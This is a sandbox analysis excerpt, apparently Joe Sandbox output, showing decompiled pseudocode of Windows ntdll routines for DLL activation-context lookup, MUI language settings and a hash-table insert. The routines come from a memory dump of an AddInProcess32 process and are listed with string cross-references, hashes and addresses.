                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                              • API String ID: 0-2897834094
                              • Opcode ID: 43eb9dbe8c6884e049d647964848cde52493e6b2e2fc4ee4c39d4ff7e1b15f11
                              • Instruction ID: cc3665d99f8cfb697f96a62f1d8a7168a74a298f8da7d5161c853befbea62480
                              • Opcode Fuzzy Hash: 43eb9dbe8c6884e049d647964848cde52493e6b2e2fc4ee4c39d4ff7e1b15f11
                              • Instruction Fuzzy Hash: 5661E63695554DEFE791ABADD484D2073A5F710B21B0A807AFB0DDB344DA289E80CF4B
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 44%
                              			E01888E00(void* __ecx) {
                              				signed int _v8;
                              				char _v12;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr* _t32;
                              				intOrPtr _t35;
                              				intOrPtr _t43;
                              				void* _t46;
                              				intOrPtr _t47;
                              				void* _t48;
                              				signed int _t49;
                              				void* _t50;
                              				intOrPtr* _t51;
                              				signed int _t52;
                              				void* _t53;
                              				intOrPtr _t55;
                              
                              				_v8 =  *0x194d360 ^ _t52;
                              				_t49 = 0;
                              				_t48 = __ecx;
                              				_t55 =  *0x1948464; // 0x74cc0110
                              				if(_t55 == 0) {
                              					L9:
                              					if( !_t49 >= 0) {
                              						if(( *0x1945780 & 0x00000003) != 0) {
                              							E018D5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                              						}
                              						if(( *0x1945780 & 0x00000010) != 0) {
                              							asm("int3");
                              						}
                              					}
                              					return E0189B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                              				}
                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                              				_t43 =  *0x1947984; // 0x12e2ba0
                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                              					if(_t48 == _t43) {
                              						_t50 = 0x5c;
                              						if( *_t32 == _t50) {
                              							_t46 = 0x3f;
                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                              								_t32 = _t32 + 8;
                              							}
                              						}
                              					}
                              					_t51 =  *0x1948464; // 0x74cc0110
                              					 *0x194b1e0(_t47, _t32,  &_v12);
                              					_t49 =  *_t51();
                              					if(_t49 >= 0) {
                              						L8:
                              						_t35 = _v12;
                              						if(_t35 != 0) {
                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                              								E01889B10( *((intOrPtr*)(_t48 + 0x48)));
                              								_t35 = _v12;
                              							}
                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                              						}
                              						goto L9;
                              					}
                              					if(_t49 != 0xc000008a) {
                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                              							if(_t49 != 0xc00000bb) {
                              								goto L8;
                              							}
                              						}
                              					}
                              					if(( *0x1945780 & 0x00000005) != 0) {
                              						_push(_t49);
                              						E018D5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                              						_t53 = _t53 + 0x1c;
                              					}
                              					_t49 = 0;
                              					goto L8;
                              				} else {
                              					goto L9;
                              				}
                              			}





















                              APIs
                              Strings
                              • minkernel\ntdll\ldrsnap.c, xrefs: 018C933B, 018C9367
                              • LdrpFindDllActivationContext, xrefs: 018C9331, 018C935D
                              • Querying the active activation context failed with status 0x%08lx, xrefs: 018C9357
                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 018C932A
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                              • API String ID: 3446177414-3779518884
                              • Opcode ID: 16cd0d8cfd4e82ef9f1c071ce9329592939bed5a7019714c9bbc3ee6d1a846bf
                              • Instruction ID: 7d8b01a5da9d55cc5e134441712f2922a49b75d4a4cc2759b499ca9e8a1138c0
                              • Opcode Fuzzy Hash: 16cd0d8cfd4e82ef9f1c071ce9329592939bed5a7019714c9bbc3ee6d1a846bf
                              • Instruction Fuzzy Hash: 23410931A407199FEB36BB5CC888E35B7B5AB46758F8A4169E904D71D1E770AF80C3C1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 96%
                              			E01863D34(signed int* __ecx) {
                              				signed int* _v8;
                              				char _v12;
                              				signed int* _v16;
                              				signed int* _v20;
                              				char _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				char _v36;
                              				signed int _v40;
                              				signed int _v44;
                              				signed int* _v48;
                              				signed int* _v52;
                              				signed int _v56;
                              				signed int _v60;
                              				char _v68;
                              				signed int _t140;
                              				signed int _t161;
                              				signed int* _t236;
                              				signed int* _t242;
                              				signed int* _t243;
                              				signed int* _t244;
                              				signed int* _t245;
                              				signed int _t255;
                              				void* _t257;
                              				signed int _t260;
                              				void* _t262;
                              				signed int _t264;
                              				void* _t267;
                              				signed int _t275;
                              				signed int* _t276;
                              				short* _t277;
                              				signed int* _t278;
                              				signed int* _t279;
                              				signed int* _t280;
                              				short* _t281;
                              				signed int* _t282;
                              				short* _t283;
                              				signed int* _t284;
                              				void* _t285;
                              
                              				_v60 = _v60 | 0xffffffff;
                              				_t280 = 0;
                              				_t242 = __ecx;
                              				_v52 = __ecx;
                              				_v8 = 0;
                              				_v20 = 0;
                              				_v40 = 0;
                              				_v28 = 0;
                              				_v32 = 0;
                              				_v44 = 0;
                              				_v56 = 0;
                              				_t275 = 0;
                              				_v16 = 0;
                              				if(__ecx == 0) {
                              					_t280 = 0xc000000d;
                              					_t140 = 0;
                              					L50:
                              					 *_t242 =  *_t242 | 0x00000800;
                              					_t242[0x13] = _t140;
                              					_t242[0x16] = _v40;
                              					_t242[0x18] = _v28;
                              					_t242[0x14] = _v32;
                              					_t242[0x17] = _t275;
                              					_t242[0x15] = _v44;
                              					_t242[0x11] = _v56;
                              					_t242[0x12] = _v60;
                              					return _t280;
                              				}
                              				if(E01861B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                              					_v56 = 1;
                              					if(_v8 != 0) {
                              						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                              					}
                              					_v8 = _t280;
                              				}
                              				if(E01861B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                              					_v60 =  *_v8;
                              					L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                              					_v8 = _t280;
                              				}
                              				if(E01861B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                              					L16:
                              					if(E01861B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                              						L28:
                              						if(E01861B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                              							L46:
                              							_t275 = _v16;
                              							L47:
                              							_t161 = 0;
                              							L48:
                              							if(_v8 != 0) {
                              								L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                              							}
                              							_t140 = _v20;
                              							if(_t140 != 0) {
                              								if(_t275 != 0) {
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                              									_t275 = 0;
                              									_v28 = 0;
                              									_t140 = _v20;
                              								}
                              							}
                              							goto L50;
                              						}
                              						_t167 = _v12;
                              						_t255 = _v12 + 4;
                              						_v44 = _t255;
                              						if(_t255 == 0) {
                              							_t276 = _t280;
                              							_v32 = _t280;
                              						} else {
                              							_t276 = L01874620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                              							_t167 = _v12;
                              							_v32 = _t276;
                              						}
                              						if(_t276 == 0) {
                              							_v44 = _t280;
                              							_t280 = 0xc0000017;
                              							goto L46;
                              						} else {
                              							E0189F3E0(_t276, _v8, _t167);
                              							_v48 = _t276;
                              							_t277 = E018A1370(_t276, 0x1834e90);
                              							_pop(_t257);
                              							if(_t277 == 0) {
                              								L38:
                              								_t170 = _v48;
                              								if( *_v48 != 0) {
                              									E0189BB40(0,  &_v68, _t170);
                              									if(L018643C0( &_v68,  &_v24) != 0) {
                              										_t280 =  &(_t280[0]);
                              									}
                              								}
                              								if(_t280 == 0) {
                              									_t280 = 0;
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                              									_v44 = 0;
                              									_v32 = 0;
                              								} else {
                              									_t280 = 0;
                              								}
                              								_t174 = _v8;
                              								if(_v8 != 0) {
                              									L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                              								}
                              								_v8 = _t280;
                              								goto L46;
                              							}
                              							_t243 = _v48;
                              							do {
                              								 *_t277 = 0;
                              								_t278 = _t277 + 2;
                              								E0189BB40(_t257,  &_v68, _t243);
                              								if(L018643C0( &_v68,  &_v24) != 0) {
                              									_t280 =  &(_t280[0]);
                              								}
                              								_t243 = _t278;
                              								_t277 = E018A1370(_t278, 0x1834e90);
                              								_pop(_t257);
                              							} while (_t277 != 0);
                              							_v48 = _t243;
                              							_t242 = _v52;
                              							goto L38;
                              						}
                              					}
                              					_t191 = _v12;
                              					_t260 = _v12 + 4;
                              					_v28 = _t260;
                              					if(_t260 == 0) {
                              						_t275 = _t280;
                              						_v16 = _t280;
                              					} else {
                              						_t275 = L01874620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                              						_t191 = _v12;
                              						_v16 = _t275;
                              					}
                              					if(_t275 == 0) {
                              						_v28 = _t280;
                              						_t280 = 0xc0000017;
                              						goto L47;
                              					} else {
                              						E0189F3E0(_t275, _v8, _t191);
                              						_t285 = _t285 + 0xc;
                              						_v48 = _t275;
                              						_t279 = _t280;
                              						_t281 = E018A1370(_v16, 0x1834e90);
                              						_pop(_t262);
                              						if(_t281 != 0) {
                              							_t244 = _v48;
                              							do {
                              								 *_t281 = 0;
                              								_t282 = _t281 + 2;
                              								E0189BB40(_t262,  &_v68, _t244);
                              								if(L018643C0( &_v68,  &_v24) != 0) {
                              									_t279 =  &(_t279[0]);
                              								}
                              								_t244 = _t282;
                              								_t281 = E018A1370(_t282, 0x1834e90);
                              								_pop(_t262);
                              							} while (_t281 != 0);
                              							_v48 = _t244;
                              							_t242 = _v52;
                              						}
                              						_t201 = _v48;
                              						_t280 = 0;
                              						if( *_v48 != 0) {
                              							E0189BB40(_t262,  &_v68, _t201);
                              							if(L018643C0( &_v68,  &_v24) != 0) {
                              								_t279 =  &(_t279[0]);
                              							}
                              						}
                              						if(_t279 == 0) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                              							_v28 = _t280;
                              							_v16 = _t280;
                              						}
                              						_t202 = _v8;
                              						if(_v8 != 0) {
                              							L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                              						}
                              						_v8 = _t280;
                              						goto L28;
                              					}
                              				}
                              				_t214 = _v12;
                              				_t264 = _v12 + 4;
                              				_v40 = _t264;
                              				if(_t264 == 0) {
                              					_v20 = _t280;
                              				} else {
                              					_t236 = L01874620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                              					_t280 = _t236;
                              					_v20 = _t236;
                              					_t214 = _v12;
                              				}
                              				if(_t280 == 0) {
                              					_t161 = 0;
                              					_t280 = 0xc0000017;
                              					_v40 = 0;
                              					goto L48;
                              				} else {
                              					E0189F3E0(_t280, _v8, _t214);
                              					_t285 = _t285 + 0xc;
                              					_v48 = _t280;
                              					_t283 = E018A1370(_t280, 0x1834e90);
                              					_pop(_t267);
                              					if(_t283 != 0) {
                              						_t245 = _v48;
                              						do {
                              							 *_t283 = 0;
                              							_t284 = _t283 + 2;
                              							E0189BB40(_t267,  &_v68, _t245);
                              							if(L018643C0( &_v68,  &_v24) != 0) {
                              								_t275 = _t275 + 1;
                              							}
                              							_t245 = _t284;
                              							_t283 = E018A1370(_t284, 0x1834e90);
                              							_pop(_t267);
                              						} while (_t283 != 0);
                              						_v48 = _t245;
                              						_t242 = _v52;
                              					}
                              					_t224 = _v48;
                              					_t280 = 0;
                              					if( *_v48 != 0) {
                              						E0189BB40(_t267,  &_v68, _t224);
                              						if(L018643C0( &_v68,  &_v24) != 0) {
                              							_t275 = _t275 + 1;
                              						}
                              					}
                              					if(_t275 == 0) {
                              						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                              						_v40 = _t280;
                              						_v20 = _t280;
                              					}
                              					_t225 = _v8;
                              					if(_v8 != 0) {
                              						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                              					}
                              					_v8 = _t280;
                              					goto L16;
                              				}
                              			}










































                              0x01863e77
                              0x01863e7a
                              0x01863e7f
                              0x01863e8c
                              0x01863e8c
                              0x01863e91
                              0x00000000
                              0x01863e91

                              Strings
                              • Kernel-MUI-Language-Allowed, xrefs: 01863DC0
                              • Kernel-MUI-Language-Disallowed, xrefs: 01863E97
                              • Kernel-MUI-Number-Allowed, xrefs: 01863D8C
                              • WindowsExcludedProcs, xrefs: 01863D6F
                              • Kernel-MUI-Language-SKU, xrefs: 01863F70
                              Memory Dump Source
                              • Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                              • Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd
                              Similarity
                              • API ID:
                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                              • API String ID: 0-258546922
                              • Opcode ID: 7d83e22b37c305bb196b190335696969ef3fb26b25ba615e0877e4f31802f3e0
                              • Instruction ID: 8ea8e64c5b6034e0f761ddf6a6b3c819bbbcd2fc5a73f40d2bbf07d61352ac3e
                              • Opcode Fuzzy Hash: 7d83e22b37c305bb196b190335696969ef3fb26b25ba615e0877e4f31802f3e0
                              • Instruction Fuzzy Hash: 0CF11572D00619EBDB12DF98C980AEEBBBDFF59750F14006AE905E7251E7349B01CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E0192E824(signed int __ecx, signed int* __edx) {
                              				signed int _v8;
                              				signed char _v12;
                              				signed int _v16;
                              				signed int _v20;
                              				signed int _v24;
                              				signed int _v28;
                              				signed int _v32;
                              				signed int _v36;
                              				signed int _v40;
                              				unsigned int _v44;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t177;
                              				signed int _t179;
                              				unsigned int _t202;
                              				signed char _t207;
                              				signed char _t210;
                              				signed int _t230;
                              				void* _t244;
                              				unsigned int _t247;
                              				signed int _t288;
                              				signed int _t289;
                              				signed int _t291;
                              				signed char _t293;
                              				signed char _t295;
                              				signed char _t298;
                              				intOrPtr* _t303;
                              				signed int _t310;
                              				signed char _t316;
                              				signed int _t319;
                              				signed char _t323;
                              				signed char _t330;
                              				signed int _t334;
                              				signed int _t337;
                              				signed int _t341;
                              				signed char _t345;
                              				signed char _t347;
                              				signed int _t353;
                              				signed char _t354;
                              				void* _t383;
                              				signed char _t385;
                              				signed char _t386;
                              				unsigned int _t392;
                              				signed int _t393;
                              				signed int _t395;
                              				signed int _t398;
                              				signed int _t399;
                              				signed int _t401;
                              				unsigned int _t403;
                              				void* _t404;
                              				unsigned int _t405;
                              				signed int _t406;
                              				signed char _t412;
                              				unsigned int _t413;
                              				unsigned int _t418;
                              				void* _t419;
                              				void* _t420;
                              				void* _t421;
                              				void* _t422;
                              				void* _t423;
                              				signed char* _t425;
                              				signed int _t426;
                              				signed int _t428;
                              				unsigned int _t430;
                              				signed int _t431;
                              				signed int _t433;
                              
                              				_v8 =  *0x194d360 ^ _t433;
                              				_v40 = __ecx;
                              				_v16 = __edx;
                              				_t289 = 0x4cb2f;
                              				_t425 = __edx[1];
                              				_t403 =  *__edx << 2;
                              				if(_t403 < 8) {
                              					L3:
                              					_t404 = _t403 - 1;
                              					if(_t404 == 0) {
                              						L16:
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						L17:
                              						_t426 = _v40;
                              						_v20 = _t426 + 0x1c;
                              						_t177 = L0187FAD0(_t426 + 0x1c);
                              						_t385 = 0;
                              						while(1) {
                              							L18:
                              							_t405 =  *(_t426 + 4);
                              							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
                              							_t316 = _t289 & _t179;
                              							_v24 = _t179;
                              							_v32 = _t316;
                              							_v12 = _t316 >> 0x18;
                              							_v36 = _t316 >> 0x10;
                              							_v28 = _t316 >> 8;
                              							if(_t385 != 0) {
                              								goto L21;
                              							}
                              							_t418 = _t405 >> 5;
                              							if(_t418 == 0) {
                              								_t406 = 0;
                              								L31:
                              								if(_t406 == 0) {
                              									L35:
                              									E0187FA00(_t289, _t316, _t406, _t426 + 0x1c);
                              									 *0x194b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
                              									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
                              									_v36 = _t319;
                              									if(_t319 != 0) {
                              										asm("stosd");
                              										asm("stosd");
                              										asm("stosd");
                              										_t408 = _v16;
                              										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
                              										 *((char*)(_t319 + 0xb)) =  *_v16;
                              										 *(_t319 + 4) = _t289;
                              										_t53 = _t319 + 0xc; // 0xc
                              										E01872280(E0189F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
                              										_t428 = _v40;
                              										_t386 = 0;
                              										while(1) {
                              											L38:
                              											_t202 =  *(_t428 + 4);
                              											_v16 = _v16 | 0xffffffff;
                              											_v16 = _v16 << (_t202 & 0x0000001f);
                              											_t323 = _v16 & _t289;
                              											_v20 = _t323;
                              											_v20 = _v20 >> 0x18;
                              											_v28 = _t323;
                              											_v28 = _v28 >> 0x10;
                              											_v12 = _t323;
                              											_v12 = _v12 >> 8;
                              											_v32 = _t323;
                              											if(_t386 != 0) {
                              												goto L41;
                              											}
                              											_t247 = _t202 >> 5;
                              											_v24 = _t247;
                              											if(_t247 == 0) {
                              												_t412 = 0;
                              												L50:
                              												if(_t412 == 0) {
                              													L53:
                              													_t291 =  *(_t428 + 4);
                              													_v28 =  *((intOrPtr*)(_t428 + 0x28));
                              													_v44 =  *(_t428 + 0x24);
                              													_v32 =  *((intOrPtr*)(_t428 + 0x20));
                              													_t207 = _t291 >> 5;
                              													if( *_t428 < _t207 + _t207) {
                              														L74:
                              														_t430 = _t291 >> 5;
                              														_t293 = _v36;
                              														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
                              														_v44 = _t210;
                              														_t159 = _t430 - 1; // 0xffffffdf
                              														_t428 = _v40;
                              														_t330 =  *(_t428 + 8);
                              														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                              														_t412 = _t293;
                              														 *_t293 =  *(_t330 + _t386 * 4);
                              														 *(_t330 + _t386 * 4) = _t293;
                              														 *_t428 =  *_t428 + 1;
                              														_t289 = 0;
                              														L75:
                              														E0186FFB0(_t289, _t412, _t428 + 0x1c);
                              														if(_t289 != 0) {
                              															_t428 =  *(_t428 + 0x24);
                              															 *0x194b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
                              															 *_t428();
                              														}
                              														L77:
                              														return E0189B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
                              													}
                              													_t334 = 2;
                              													_t207 = E0188F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
                              													if(_t207 < 0) {
                              														goto L74;
                              													}
                              													_t413 = _v24;
                              													if(_t413 < 4) {
                              														_t413 = 4;
                              													}
                              													 *0x194b1e0(_t413 << 2, _v28);
                              													_t207 =  *_v32();
                              													_t386 = _t207;
                              													_v16 = _t386;
                              													if(_t386 == 0) {
                              														_t291 =  *(_t428 + 4);
                              														if(_t291 >= 0x20) {
                              															goto L74;
                              														}
                              														_t289 = _v36;
                              														_t412 = 0;
                              														goto L75;
                              													} else {
                              														_t108 = _t413 - 1; // 0x3
                              														_t337 = _t108;
                              														if((_t413 & _t337) == 0) {
                              															L62:
                              															if(_t413 > 0x4000000) {
                              																_t413 = 0x4000000;
                              															}
                              															_t295 = _t386;
                              															_v24 = _v24 & 0x00000000;
                              															_t392 = _t413 << 2;
                              															_t230 = _t428 | 0x00000001;
                              															_t393 = _t392 >> 2;
                              															asm("sbb ecx, ecx");
                              															_t341 =  !(_v16 + _t392) & _t393;
                              															if(_t341 <= 0) {
                              																L67:
                              																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
                              																_v32 = _t395;
                              																_v20 = 0;
                              																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
                              																	L72:
                              																	_t345 =  *(_t428 + 8);
                              																	_t207 = _v16;
                              																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
                              																	 *(_t428 + 8) = _t207;
                              																	 *(_t428 + 4) = _t291;
                              																	if(_t345 != 0) {
                              																		 *0x194b1e0(_t345, _v28);
                              																		_t207 =  *_v44();
                              																		_t291 =  *(_t428 + 4);
                              																	}
                              																	goto L74;
                              																} else {
                              																	goto L68;
                              																}
                              																do {
                              																	L68:
                              																	_t298 =  *(_t428 + 8);
                              																	_t431 = _v20;
                              																	_v12 = _t298;
                              																	while(1) {
                              																		_t347 =  *(_t298 + _t431 * 4);
                              																		_v24 = _t347;
                              																		if((_t347 & 0x00000001) != 0) {
                              																			goto L71;
                              																		}
                              																		 *(_t298 + _t431 * 4) =  *_t347;
                              																		_t300 =  *(_t347 + 4) & _t395;
                              																		_t398 = _v16;
                              																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
                              																		_t303 = _v24;
                              																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
                              																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
                              																		_t395 = _v32;
                              																		_t298 = _v12;
                              																	}
                              																	L71:
                              																	_v20 = _t431 + 1;
                              																	_t428 = _v40;
                              																} while (_v20 <  *(_t428 + 4) >> 5);
                              																goto L72;
                              															} else {
                              																_t399 = _v24;
                              																do {
                              																	_t399 = _t399 + 1;
                              																	 *_t295 = _t230;
                              																	_t295 = _t295 + 4;
                              																} while (_t399 < _t341);
                              																goto L67;
                              															}
                              														}
                              														_t354 = _t337 | 0xffffffff;
                              														if(_t413 == 0) {
                              															L61:
                              															_t413 = 1 << _t354;
                              															goto L62;
                              														} else {
                              															goto L60;
                              														}
                              														do {
                              															L60:
                              															_t354 = _t354 + 1;
                              															_t413 = _t413 >> 1;
                              														} while (_t413 != 0);
                              														goto L61;
                              													}
                              												}
                              												_t89 = _t412 + 8; // 0x8
                              												_t244 = E0192E7A8(_t89);
                              												_t289 = _v36;
                              												if(_t244 == 0) {
                              													_t412 = 0;
                              												}
                              												goto L75;
                              											}
                              											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
                              											_t323 = _v32;
                              											while(1) {
                              												L41:
                              												_t386 =  *_t386;
                              												_v12 = _t386;
                              												if((_t386 & 0x00000001) != 0) {
                              													break;
                              												}
                              												if(_t323 == ( *(_t386 + 4) & _v16)) {
                              													L45:
                              													if(_t386 == 0) {
                              														goto L53;
                              													}
                              													if(E0192E7EB(_t386, _t408) != 0) {
                              														_t412 = _v12;
                              														goto L50;
                              													}
                              													_t386 = _v12;
                              													goto L38;
                              												}
                              											}
                              											_t386 = 0;
                              											_v12 = 0;
                              											goto L45;
                              										}
                              									}
                              									_t412 = 0;
                              									goto L77;
                              								}
                              								_t38 = _t406 + 8; // 0x8
                              								_t364 = _t38;
                              								if(E0192E7A8(_t38) == 0) {
                              									_t406 = 0;
                              								}
                              								E0187FA00(_t289, _t364, _t406, _v20);
                              								goto L77;
                              							}
                              							_t24 = _t418 - 1; // -1
                              							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
                              							_t316 = _v32;
                              							L21:
                              							_t406 = _v24;
                              							while(1) {
                              								_t385 =  *_t385;
                              								_v12 = _t385;
                              								if((_t385 & 0x00000001) != 0) {
                              									break;
                              								}
                              								if(_t316 == ( *(_t385 + 4) & _t406)) {
                              									L26:
                              									if(_t385 == 0) {
                              										goto L35;
                              									}
                              									_t177 = E0192E7EB(_t385, _v16);
                              									if(_t177 != 0) {
                              										_t406 = _v12;
                              										goto L31;
                              									}
                              									_t385 = _v12;
                              									goto L18;
                              								}
                              							}
                              							_t385 = 0;
                              							_v12 = 0;
                              							goto L26;
                              						}
                              					}
                              					_t419 = _t404 - 1;
                              					if(_t419 == 0) {
                              						L15:
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						_t425 =  &(_t425[1]);
                              						goto L16;
                              					}
                              					_t420 = _t419 - 1;
                              					if(_t420 == 0) {
                              						L14:
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						_t425 =  &(_t425[1]);
                              						goto L15;
                              					}
                              					_t421 = _t420 - 1;
                              					if(_t421 == 0) {
                              						L13:
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						_t425 =  &(_t425[1]);
                              						goto L14;
                              					}
                              					_t422 = _t421 - 1;
                              					if(_t422 == 0) {
                              						L12:
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						_t425 =  &(_t425[1]);
                              						goto L13;
                              					}
                              					_t423 = _t422 - 1;
                              					if(_t423 == 0) {
                              						L11:
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						_t425 =  &(_t425[1]);
                              						goto L12;
                              					}
                              					if(_t423 != 1) {
                              						goto L17;
                              					} else {
                              						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
                              						_t425 =  &(_t425[1]);
                              						goto L11;
                              					}
                              				} else {
                              					_t401 = _t403 >> 3;
                              					_t403 = _t403 + _t401 * 0xfffffff8;
                              					do {
                              						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
                              						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
                              						_t288 = _t425[7] & 0x000000ff;
                              						_t425 =  &(_t425[8]);
                              						_t289 = _t310 + _t383 + _t288;
                              						_t401 = _t401 - 1;
                              					} while (_t401 != 0);
                              					goto L3;
                              				}
                              			}
                              0x00000000
                              0x00000000
                              0x0192ed4b
                              0x0192ed4e
                              0x00000000
                              0x0192eb9d
                              0x0192eb9d
                              0x0192eb9d
                              0x0192eba2
                              0x0192ebb5
                              0x0192ebbc
                              0x0192ebbe
                              0x0192ebbe
